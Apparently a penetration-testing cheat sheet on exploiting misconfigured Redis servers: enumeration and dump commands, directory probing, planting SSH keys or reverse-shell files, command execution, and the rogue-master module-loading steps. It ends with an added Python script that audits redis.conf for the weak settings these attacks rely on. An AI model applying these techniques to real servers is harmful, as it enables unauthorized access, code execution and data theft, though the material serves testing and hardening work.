- Runs on port 6379 — needs a full nmap scan!
- If connection is possible via telnet, useful commands are:
  - info
  - CONFIG GET *
  - all keys: keys *
- It is possible to determine which directories exist:

  ```
  config set dir /var/www/htdocs
  -ERR Changing directory: No such file or directory
  config set dir /var/www
  +OK
  config set dir /var/www/html
  +OK
  ```
- Upload an SSH key via Redis if there is write access to a user's directory. A username has to be known.
- Hint: if there is any writeable directory which is available via a web server, try the SSH writing method to write a reverse shell file somewhere to a web server directory.
- Execute commands with:

  ```
  system.exec "id"
  ```
- Complete list of commands
- See
- DON’T use telnet / nc / … Use redis-cli -h <ip> to connect.
- Use redis-dump to dump a badly configured redis instance:

  ```
  npm install redis-dump -g
  redis-dump -h 10.10.10.160 --json
  ```
Master/slave configuration
In the master/slave configuration, there is one master which allows only write access and n slaves which allow only read access.
Important: The master must not be in protected mode.
- If it can be restarted or the config file can be changed, set the --protected-mode no flag.
- If not:
  - On the master: Set the password with

    ```
    config set requirepass mypass
    ```
  - On the slave: Set the master’s password with

    ```
    config set masterauth mypass
    ```
  - If a system wants the password after logging into the shell again, use the following to authenticate:

    ```
    auth mypass
    ```
Make a node a master (default):

```
redis> slaveof no one
```

Make a node a slave:

```
redis> slaveof <master_ip> <master_port>
```
The process is as follows; see also the redis-rogue-server script, which needs the addition of the Command module.
- Set to slave
- Set output db file to module filename
- Perform sync, pass the module’s binary data escaped
- Load the module
- Set to master
Now the module is inserted. Note: The module exp.so has to be compiled for the correct architecture.
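A defensive counterpart to the steps above, as an added example that is not part of the original notes: a small audit of redis.conf text for the settings these techniques rely on (no password, protected mode off, a listener on all interfaces, and CONFIG / SLAVEOF / MODULE callable under their default names). The two sample configs, the placeholder password and the choice of checks are constructed for illustration.

```python
import shlex

# Commands the techniques above depend on (CONFIG SET dir, SLAVEOF, module loading).
RISKY_COMMANDS = ("CONFIG", "SLAVEOF", "REPLICAOF", "MODULE")

# Constructed sample configs, not taken from any real host.
WEAK_CONF = "bind 0.0.0.0\nprotected-mode no\nport 6379\ndir /var/lib/redis\n"
HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
requirepass "constructed-placeholder-secret"
rename-command CONFIG ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command MODULE ""
"""

def parse_redis_conf(text):
    """Parse redis.conf text into {directive: [argument lists]}; directives may repeat."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            parts = shlex.split(line)  # keeps quoted values such as "" as one token
            conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf

def audit(text):
    """Return a list of findings for settings that leave the instance open to abuse."""
    conf = parse_redis_conf(text)
    last = lambda key: conf[key][-1] if key in conf else []  # last occurrence wins
    findings = []
    if last("protected-mode")[:1] == ["no"]:
        findings.append("protected-mode is disabled")
    if not "".join(last("requirepass")):
        findings.append("requirepass is not set")
    binds = [addr.lstrip("-") for addr in last("bind")]
    if not binds or any(addr in ("0.0.0.0", "*", "::", "::*") for addr in binds):
        findings.append("listens on all interfaces")
    renamed = {a[0].upper() for a in conf.get("rename-command", []) if len(a) == 2}
    for cmd in RISKY_COMMANDS:
        if cmd not in renamed:
            findings.append(f"{cmd} is callable under its default name")
    return findings

if __name__ == "__main__":
    for name, sample in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(sample))
```

On current Redis versions ACLs are the preferred way to restrict commands; rename-command is checked here because it can be read from the config file alone.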